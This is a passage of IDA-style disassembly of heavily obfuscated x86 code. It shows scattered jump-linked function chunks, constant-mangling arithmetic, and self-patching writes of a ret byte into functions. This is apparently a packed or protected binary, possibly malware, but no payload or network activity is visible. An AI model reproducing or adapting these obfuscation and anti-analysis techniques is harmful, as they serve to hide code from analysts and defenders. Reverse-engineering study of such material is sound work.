; FUNCTION CHUNK AT 00449E54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B05 SIZE 0000000D BYTES
push ebp
jmp loc_449E54
sub_453C2C endp
; ---------------------------------------------------------------------------
mov edi, ecx
and esi, 0CD70A491h
jmp sub_453303
; ---------------------------------------------------------------------------
loc_453C3F: ; DATA XREF: sub_44AD6F+9623o
xchg eax, [esp]
jmp sub_45499E
; ---------------------------------------------------------------------------
mov edi, eax
ror eax, 0Dh
jmp sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440E5F
loc_453C51: ; CODE XREF: sub_440E5F+1Aj
mov ds:off_41D118, eax
lea eax, sub_459F30
mov byte ptr [eax], 0C3h
jmp sub_459F30
; ---------------------------------------------------------------------------
loc_453C65: ; CODE XREF: sub_440E5F+1j
mov eax, [esp-4+arg_0]
jmp loc_44EFEF
; END OF FUNCTION CHUNK FOR sub_440E5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_453C6D: ; CODE XREF: sub_443BC5:loc_4404CCj
; sub_4565B2:loc_454D51j
pop edx
sub edx, 60F2255Eh
add edx, 5C144002h
xchg edx, [esp-4+arg_0]
jmp loc_44200A
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_453C82: ; CODE XREF: ut7h7i2x:0043F214j
; sub_4565B2:loc_44EF34j
push ecx
push 0FC8CA6EFh
jmp loc_43E847
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A240
loc_453C8D: ; CODE XREF: sub_43A240:loc_44E683j
pop eax
pop ecx
pop ebx
pop edx
pop eax
xchg edi, [esp-1Ch+arg_18]
push offset sub_453C9F
jmp nullsub_488
; END OF FUNCTION CHUNK FOR sub_43A240
; =============== S U B R O U T I N E =======================================
sub_453C9F proc near ; DATA XREF: sub_43A240+19A55o
mov ebp, edi
pop edi
jmp loc_44E6F1
sub_453C9F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_453CA7: ; CODE XREF: ut7h7i2x:loc_4484ADj
cmp edx, ebx
push offset sub_4589C7
jmp locret_441DD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_453CB3: ; CODE XREF: sub_43FF65:loc_4593A0j
jz loc_451F66
mov ebx, [eax]
jmp loc_451F63
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
dword_453CC0 dd 0 ; DATA XREF: ut7h7i2x:loc_43C0CDr
; sub_45226Fw
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_453CC4: ; CODE XREF: sub_439BF8+1F01Dj
jmp loc_44CB0C
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_453CC9: ; CODE XREF: ut7h7i2x:004392A3j
jmp loc_43EF68
; ---------------------------------------------------------------------------
loc_453CCE: ; DATA XREF: ut7h7i2x:0044013Bo
; sub_43A0C7+19B0Do
rol dword ptr [esi-7657ED96h], 1
mov [ebx], esi
sbb [ebx+0D8B119h], ecx
; START OF FUNCTION CHUNK FOR sub_44A833
loc_453CDC: ; CODE XREF: sub_44A833+Bj
jmp nullsub_177
; END OF FUNCTION CHUNK FOR sub_44A833
; ---------------------------------------------------------------------------
jnz loc_448107
mov edx, ds:dword_444420
call sub_4583C4
; START OF FUNCTION CHUNK FOR sub_457A66
loc_453CF2: ; CODE XREF: sub_457A66-1C169j
ror edi, 19h
loc_453CF5: ; CODE XREF: ut7h7i2x:loc_439554j
; sub_457A66:loc_439D00j ...
jmp loc_455B1E
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_453CFA: ; CODE XREF: ut7h7i2x:0043DA5Cj
; ut7h7i2x:004409BCj ...
pop ecx
pop ebp
jmp loc_43F4B6
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
loc_453D01: ; CODE XREF: ut7h7i2x:0043FA7Ej
jb loc_43E70C
; =============== S U B R O U T I N E =======================================
sub_453D07 proc near ; CODE XREF: sub_440DA3:loc_4425A0p
; FUNCTION CHUNK AT 0043CAE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004516D9 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00457211 SIZE 00000003 BYTES
xchg esi, [esp+0]
pop esi
mov eax, offset dword_43E35C
jmp loc_4516D9
sub_453D07 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push edx
push 0E22D2409h
pop edx
xor edx, 95804084h
rol edx, 0Bh
jmp loc_454843
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449744
loc_453D2A: ; CODE XREF: sub_449744:loc_43CADFj
; ut7h7i2x:0044F698j
xor ecx, 0CC236989h
add ecx, ebp
add ecx, 0F9A9AB20h
mov [ecx], eax
pop ecx
mov eax, [ebp-4]
mov al, [eax]
push offset sub_43B4E3
; END OF FUNCTION CHUNK FOR sub_449744
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_453D45: ; CODE XREF: sub_44F43B-115B3j
jmp loc_444FD8
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_453D4A: ; CODE XREF: sub_4462B0-A795j
jnb loc_4595F3
jno loc_4544F1
jmp loc_43C8A3
; END OF FUNCTION CHUNK FOR sub_4462B0
; =============== S U B R O U T I N E =======================================
sub_453D5B proc near ; CODE XREF: sub_4417AF-3293p
; ut7h7i2x:00457B3Fj
xchg edi, [esp+0]
pop edi
sub al, 99h
mov edx, [ebp-4]
loc_453D64: ; CODE XREF: ut7h7i2x:00444791j
imul byte ptr [edx]
cmp al, 0A4h
jmp loc_442BDF
sub_453D5B endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_476. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_453D6E: ; CODE XREF: sub_4471CA-9421j
jmp loc_439CD0
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C969
loc_453D73: ; CODE XREF: sub_43C969+8j
jmp locret_441B47
; END OF FUNCTION CHUNK FOR sub_43C969
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_453D78: ; CODE XREF: sub_43F7A5+35F9j
inc dword ptr [ebp-0Ch]
jmp loc_450DA3
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_453D80: ; CODE XREF: sub_4396F5+ACD8j
; sub_4396F5+16F32j
inc [ebp+var_8]
inc [ebp+var_C]
jmp loc_4443C1
; END OF FUNCTION CHUNK FOR sub_4396F5
; =============== S U B R O U T I N E =======================================
sub_453D8B proc near ; CODE XREF: ut7h7i2x:0043A1C0p
; sub_43DBEC:loc_43A6EFp ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B085 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043FE2D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00448390 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449E3B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A183 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E228 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044F27F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453E57 SIZE 00000005 BYTES
call sub_44CAA4
loc_453D90: ; CODE XREF: ut7h7i2x:0044407Cj
jnz loc_43FE2D
loc_453D96: ; CODE XREF: sub_444A12:loc_44F7E5p
xchg edx, [esp+0]
pop edx
push 0CF46DD7Dh
pop eax
rol eax, 3
or eax, 0EEB35CBh
jmp loc_448390
sub_453D8B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD39
loc_453DAE: ; CODE XREF: sub_44DD39-111A7j
xor eax, 122267C7h
add eax, 0D56B063Eh
sub eax, 77EEF929h
add eax, 9B2FB736h
call sub_4448AF
push offset loc_43FA97
jmp loc_458563
; END OF FUNCTION CHUNK FOR sub_44DD39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_453DD5: ; CODE XREF: sub_44FC60-11437j
jnz loc_44A32A
; END OF FUNCTION CHUNK FOR sub_44FC60
; START OF FUNCTION CHUNK FOR sub_43AF72
loc_453DDB: ; CODE XREF: sub_43AF72+19119j
jmp nullsub_186
; END OF FUNCTION CHUNK FOR sub_43AF72
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4446B0
loc_453DE0: ; CODE XREF: sub_4446B0-838Aj
jmp loc_44C7BF
; END OF FUNCTION CHUNK FOR sub_4446B0
; ---------------------------------------------------------------------------
ror esi, 1Bh
jmp loc_44A31F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_453DED: ; CODE XREF: sub_455807-1A807j
ja loc_44E7DC
loc_453DF3: ; CODE XREF: sub_455807-18BF2j
; sub_443C4A+117Fj ...
jmp loc_444F9B
; ---------------------------------------------------------------------------
loc_453DF8: ; CODE XREF: sub_455807-1A74Ej
; sub_443C4A-7D57j
xchg eax, [esp+0]
mov ecx, eax
pop eax
pop ebp
jmp loc_458534
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_453E04: ; CODE XREF: sub_444A08+76AAj
add ecx, 4AF57CDDh
call sub_44696A
loc_453E0F: ; CODE XREF: sub_4593D3-A4C6j
jmp loc_43B1C8
; END OF FUNCTION CHUNK FOR sub_444A08
; =============== S U B R O U T I N E =======================================
sub_453E14 proc near ; CODE XREF: sub_43B7F7+8p
; ut7h7i2x:0044DAEBj
; FUNCTION CHUNK AT 0043AEF2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043BC0E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CEB1 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043EAF4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043FBA5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004406EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444E40 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004466E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447872 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448AAF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DF43 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044EA55 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450885 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00450CAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451FB5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004538C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E01 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456D48 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458E73 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F4B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A42E SIZE 00000007 BYTES
xchg edi, [esp+0]
pop edi
sub eax, 0FFFFFFFFh
jl loc_44A5B7
jmp loc_4466E7
sub_453E14 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_453E26 proc near ; CODE XREF: sub_44F712j
; DATA XREF: sub_43B1E6:loc_44F708o
; FUNCTION CHUNK AT 0043F066 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446F02 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448B1F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004515D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004548EE SIZE 00000005 BYTES
add eax, 23A2BE86h
mov eax, [eax]
or eax, eax
jnz loc_4548EE
jmp loc_43F066
sub_453E26 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_453E3B: ; CODE XREF: sub_44EC11-E579j
; sub_453E14:loc_454E01j
movzx eax, word ptr [ebp-6]
push 0C30652E5h
pop edx
add edx, 0DB5251B3h
xor edx, 34991932h
jmp loc_4597A0
; END OF FUNCTION CHUNK FOR sub_44EC11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_174. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_453E57: ; CODE XREF: sub_453D8B-4B03j
jmp loc_44A183
; END OF FUNCTION CHUNK FOR sub_453D8B
; =============== S U B R O U T I N E =======================================
sub_453E5C proc near ; DATA XREF: sub_43CB0D:loc_457861o
push dword ptr [ebp+10h]
call sub_4395FB
sub_453E5C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_453FFB
loc_453E64: ; CODE XREF: sub_453FFB+6C9j
jmp loc_439A09
; END OF FUNCTION CHUNK FOR sub_453FFB
; ---------------------------------------------------------------------------
loc_453E69: ; CODE XREF: ut7h7i2x:0044BC9Fj
jge loc_440DCD
mov ecx, eax
jmp loc_43CF10
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_453E77: ; CODE XREF: sub_444851+35BAj
jmp loc_441ACF
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
mov eax, 524E554Eh
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_453E81: ; CODE XREF: sub_44B45E:loc_43DE56j
call sub_43AA94
mov ds:dword_41D058, eax
lea eax, nullsub_22
call sub_45A1C3
locret_453E97: ; CODE XREF: sub_4572A7-171F2j
retn
; END OF FUNCTION CHUNK FOR sub_44B45E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_245. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_453E99: ; CODE XREF: sub_446F9A+14B1j
jge loc_457E7E
jbe loc_4422AF
pushf
adc edi, ebp
xchg ecx, ebx
jmp loc_457E7E
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_453EAF: ; CODE XREF: sub_4433C5+9D1Bj
and ecx, 8B6112E8h
jmp loc_43BD94
; END OF FUNCTION CHUNK FOR sub_4433C5
; =============== S U B R O U T I N E =======================================
sub_453EBA proc near ; DATA XREF: sub_45108E-11880o
; FUNCTION CHUNK AT 0043F360 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004497E8 SIZE 00000020 BYTES
call sub_450EFA
mov eax, 729645CDh
call sub_43AED9
push edx
push 0AC058A40h
pop edx
jmp loc_4497E8
sub_453EBA endp
; ---------------------------------------------------------------------------
popf
jmp sub_4415EB
; ---------------------------------------------------------------------------
loc_453EDB: ; CODE XREF: ut7h7i2x:0044215Fj
add esi, edi
xchg ecx, [edi]
rol edi, 3
; START OF FUNCTION CHUNK FOR sub_43A556
loc_453EE2: ; CODE XREF: sub_43A556:loc_442152j
xor eax, 32E350DCh
add eax, ebp
jmp loc_44656C
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_453EEF: ; CODE XREF: ut7h7i2x:004441CAj
sbb ebp, 61B43B79h
loc_453EF5: ; CODE XREF: ut7h7i2x:loc_4441ABj
xor edx, 0A627119Ch
add edx, 121EB561h
call sub_44ED9F
push ecx
mov ecx, eax
xchg ecx, [esp]
jmp loc_457C5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_453F11: ; CODE XREF: ut7h7i2x:00449622j
; sub_439BF8+1269Aj
xor esi, 72177D31h
add eax, esi
loc_453F19: ; CODE XREF: ut7h7i2x:loc_447B5Dj
pop esi
call sub_44C595
loc_453F1F: ; CODE XREF: sub_439BF8+1B595j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_453F24: ; CODE XREF: ut7h7i2x:00446DDDj
jmp loc_441CDE
; ---------------------------------------------------------------------------
loc_453F29: ; CODE XREF: ut7h7i2x:00448BA4j
sub eax, esi
not esi
js loc_445286
jmp loc_4560C2
; ---------------------------------------------------------------------------
loc_453F38: ; CODE XREF: ut7h7i2x:0043ECE7j
test ecx, ebp
jmp loc_442BB2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_453F40: ; CODE XREF: sub_43EF73+17F05j
jmp loc_44CA34
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_453F45: ; CODE XREF: sub_43DBEC+17C9Fj
jmp sub_45500F
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_453F4A: ; CODE XREF: sub_457A66:loc_43E7C1j
jnz loc_447BE0
; END OF FUNCTION CHUNK FOR sub_457A66
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_453F50: ; CODE XREF: sub_4503C3:loc_43AC2Ej
jmp loc_457095
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
push 0E8B8B651h
jmp loc_43DAFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_453F5F: ; CODE XREF: sub_43DBEC+48C9j
; ut7h7i2x:0045528Ej
pop ebx
ror eax, 3
call sub_447CBE
loc_453F68: ; DATA XREF: sub_43A0C7+19B13o
push eax
loc_453F69: ; CODE XREF: sub_4549F0-17DCAj
push offset sub_43A218
jmp nullsub_459
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
db 85h
dd 92D5E9FEh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_453F7A: ; CODE XREF: sub_444029:loc_445436j
jnz loc_456812
jmp loc_45461C
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_453F85: ; CODE XREF: sub_44A3BB+6B6j
; ut7h7i2x:loc_45955Fj
xor eax, 33CED593h
add eax, 4062E003h
add eax, ebp
add eax, 39BDAAFDh
mov eax, [eax]
cmp dword ptr [eax+4], 0
jmp loc_43F10D
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4393B6
loc_453FA4: ; CODE XREF: sub_4393B6+10j
push eax
push 0
push edi
push 0C6D52E20h
pop edi
jmp loc_43D54D
; END OF FUNCTION CHUNK FOR sub_4393B6
; ---------------------------------------------------------------------------
adc ebx, edx
shl edi, 14h
jmp sub_44749D
; ---------------------------------------------------------------------------
loc_453FBD: ; CODE XREF: ut7h7i2x:004442C7j
jnz loc_4551CB
loc_453FC3: ; CODE XREF: ut7h7i2x:0043BC75j
and esi, 6E4E8D1Ah
add esi, 0C8B0C0E6h
loc_453FCF: ; CODE XREF: ut7h7i2x:loc_454501j
or esi, ds:4000FBh
add esi, 14DD64Ch
jmp loc_44B3A4
; ---------------------------------------------------------------------------
loc_453FE0: ; CODE XREF: ut7h7i2x:0043EC89j
test ecx, esi
jmp loc_44482A
; ---------------------------------------------------------------------------
loc_453FE7: ; CODE XREF: ut7h7i2x:0044D23Bj
call sub_453303
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_453FEC: ; CODE XREF: sub_44C99C-3E8Dj
jmp nullsub_182
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_453FF1: ; CODE XREF: sub_439AE7+6C48j
jmp loc_448652
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D998
loc_453FF6: ; CODE XREF: sub_44D998-EF06j
jmp nullsub_183
; END OF FUNCTION CHUNK FOR sub_44D998
; =============== S U B R O U T I N E =======================================
sub_453FFB proc near ; CODE XREF: sub_4482AE:loc_439063j
; sub_449E26p ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439A09 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004425E3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A375 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453E64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004546B6 SIZE 00000013 BYTES
pop edx
jb loc_4546B6
mov eax, [esp+0]
push edx
jmp loc_44A375
sub_453FFB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408DB
loc_45400B: ; CODE XREF: sub_4408DB+Fj
mov byte ptr [eax], 0C3h
jmp loc_443ED3
; END OF FUNCTION CHUNK FOR sub_4408DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454466
loc_454013: ; CODE XREF: sub_454466+4j
mov eax, [esp+0]
push edx
push ebx
push 0B386308Eh
pop ebx
jmp loc_43A7AC
; END OF FUNCTION CHUNK FOR sub_454466
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FA50
loc_454023: ; CODE XREF: sub_43FA50:loc_44AF36j
call sub_452E7F
push offset sub_450F4F
jmp loc_43A561
; END OF FUNCTION CHUNK FOR sub_43FA50
; ---------------------------------------------------------------------------
mov eax, 203AE851h
push ebx
push 8B0FC5BDh
pop ebx
jmp loc_4559D0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_454043 proc near ; DATA XREF: ut7h7i2x:00450C85o
push ebp
mov ebp, esp
push eax
sub_454043 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_454047 proc near ; CODE XREF: sub_444AA3+E130j
push ebx
pop eax
call sub_44F57E
sub_454047 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44875F
loc_45404E: ; CODE XREF: sub_44875F+10j
jmp loc_44A0F8
; END OF FUNCTION CHUNK FOR sub_44875F
; ---------------------------------------------------------------------------
loc_454053: ; CODE XREF: ut7h7i2x:00444B84j
jmp loc_44C2B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_454058: ; CODE XREF: sub_444A08:loc_456194j
add eax, ebp
add eax, 8A802271h
mov eax, [eax]
mov byte ptr [eax], 6Ch
jmp loc_450CA5
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_45406A: ; CODE XREF: sub_455145-2CA4j
jl loc_45677D
; END OF FUNCTION CHUNK FOR sub_455145
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_454070: ; CODE XREF: sub_4408C2-2D2Fj
; sub_455145:loc_452ED2j ...
jnb loc_4488A3
push offset sub_44081E
jmp nullsub_185
; END OF FUNCTION CHUNK FOR sub_43B9B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_410. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_454081: ; CODE XREF: sub_43B9B1+5461j
jmp loc_447526
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AF72
loc_454086: ; CODE XREF: sub_43AF72:loc_44FDFFj
push offset loc_447105
jmp loc_453DDB
; END OF FUNCTION CHUNK FOR sub_43AF72
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4570FD
loc_454090: ; CODE XREF: ut7h7i2x:loc_4549CAj
; sub_4570FD+10j
xchg ebx, [esp+0]
mov ecx, ebx
pop ebx
pop ecx
pop ebp
jmp loc_43AABA
; END OF FUNCTION CHUNK FOR sub_4570FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_45409D: ; CODE XREF: sub_44081E:loc_448948j
jz loc_43E4BE
jmp loc_450F87
; END OF FUNCTION CHUNK FOR sub_44081E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_209. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4540A9: ; CODE XREF: ut7h7i2x:004409A3j
jmp loc_457274
; =============== S U B R O U T I N E =======================================
sub_4540AE proc near ; CODE XREF: sub_4506D3+3p
; ut7h7i2x:00451E81j
xchg ecx, [esp+0]
pop ecx
mov ds:dword_44A87C, eax
sub_4540AE endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_499. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_4540B9: ; CODE XREF: sub_444374+10606j
; ut7h7i2x:00458A5Bj
rol eax, 0Ch
jmp loc_452066
; END OF FUNCTION CHUNK FOR sub_444374
; =============== S U B R O U T I N E =======================================
sub_4540C1 proc near ; CODE XREF: sub_440FC3+13EA2j
push ebx
push 60C72AF8h
pop ebx
add ebx, 0C95FAE2Ch
or ebx, 0C9409E4Bh
add ebx, 1119D570h
or ebx, 0D74DE11h
push offset loc_45012D
jmp nullsub_340
sub_4540C1 endp
; ---------------------------------------------------------------------------
loc_4540EA: ; CODE XREF: ut7h7i2x:0044CF52j
; ut7h7i2x:loc_45A1F6j
mov eax, [ebp-4]
push offset sub_4523CA
jmp locret_44A1AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4594B7
loc_4540F7: ; CODE XREF: sub_4594B7:loc_4405CCj
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_4594B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_4540F9: ; CODE XREF: sub_4456F4+2ACFj
; sub_449FD5+4A04j
rol eax, 3
push edi
mov edi, eax
xchg edi, [esp+4+var_4]
call sub_454196
jmp nullsub_187
; END OF FUNCTION CHUNK FOR sub_4456F4
; =============== S U B R O U T I N E =======================================
sub_45410C proc near ; DATA XREF: sub_4508DB:loc_43C9C9o
; FUNCTION CHUNK AT 0043A8EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D972 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E79C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004474F8 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00447DBF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A597 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E427 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044E976 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004535C4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454CDD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00455434 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456682 SIZE 00000012 BYTES
imul byte ptr [edx]
cmp al, 0A4h
jz loc_443D12
jmp loc_44A597
sub_45410C endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_475. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_45411C: ; CODE XREF: sub_447CBE+107C5j
js loc_456D2D
; END OF FUNCTION CHUNK FOR sub_447CBE
; START OF FUNCTION CHUNK FOR sub_456EE0
loc_454122: ; CODE XREF: sub_456EE0-142CEj
; ut7h7i2x:loc_4534E2j
jmp nullsub_278
; END OF FUNCTION CHUNK FOR sub_456EE0
; ---------------------------------------------------------------------------
pop ecx
pushf
sbb eax, 44984EB4h
jmp loc_456D2B
; ---------------------------------------------------------------------------
test eax, ecx
jmp loc_4433D9
; =============== S U B R O U T I N E =======================================
sub_45413B proc near ; CODE XREF: sub_44A0CE-A959p
; ut7h7i2x:00458B81j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004411D7 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xchg ebx, [esp-4+arg_0]
loc_454142: ; CODE XREF: sub_44825D+A626j
jmp loc_4411D7
sub_45413B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_454147: ; CODE XREF: ut7h7i2x:0045851Bj
not eax
test ecx, eax
jmp loc_43D078
; ---------------------------------------------------------------------------
locret_454150: ; CODE XREF: ut7h7i2x:00458629j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_454151: ; CODE XREF: sub_439BD1+186FCj
jmp loc_445EB8
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_454156: ; CODE XREF: ut7h7i2x:0044FA82j
jmp loc_455099
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_45415B: ; CODE XREF: sub_43EF73+6001j
jmp loc_4434FD
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
loc_454160: ; CODE XREF: ut7h7i2x:0044297Bj
jmp loc_455657
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4406F1
